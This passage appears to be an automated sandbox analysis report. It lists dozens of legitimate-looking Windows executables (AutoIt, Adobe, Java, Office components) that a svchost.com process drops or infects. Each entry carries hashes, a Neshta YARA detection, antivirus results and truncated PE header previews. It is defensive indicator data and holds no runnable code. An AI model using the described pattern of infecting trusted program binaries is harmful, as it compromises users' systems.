                                                                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):7.2906774035349695
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.586052312714495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529393382316189
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.7205787223638
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.52588514314363
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5042461329985075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGhFAlQY7rMdInNwUdROnIDh+vE6YjhmnCu26W:sr85CAlQGrkInNwUPOnWh+vEzEnCh7
                                                                                                                        MD5:A5EA90AC4FC049DF79D7DB1814B9B326
                                                                                                                        SHA1:1AE4394BAB6F0CEB3F1EE611B460C0FD632E87C5
                                                                                                                        SHA-256:61B25B74A7126A96A87A8D313B850CEAD18B5AB5389E9FF2B2C9A164927A08D2
                                                                                                                        SHA-512:DC6FBDEB7D79AEDB4479A4D8742D15AAA4BEEE97892715406D58E0C5E1511073C85D91B287E7CA75DE376C0C9A6BC2A307115A646600261EDDD6DD287D5AD036
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.210368811104495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCed9fP4LXRxQyEvzDmxvuLX+:sr85Ca4dOyEv/mxmLO
                                                                                                                        MD5:27D5B0E45DB81F836CF687549F844753
                                                                                                                        SHA1:4EE8AF1DE81163B66C20D4D4C652250D3B116544
                                                                                                                        SHA-256:365857D447BD640AC5A1BA7F32AF69211AD8F7C3AA0345C925FADCD6635D8C44
                                                                                                                        SHA-512:42BC2AAE4F5371F7F6E21CA25A28578929C160C7B0DD629239BF1C1F47C1E59AC5E56E1E33C8C1B074FE5393A88076F214D73729074E72A2AF1F6F83386A573A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.599158686971261
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6085003171859364
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.62851477500423
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529062771218018
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4112170834310565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.374994892226591
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.305732261424221
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.375840229458048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
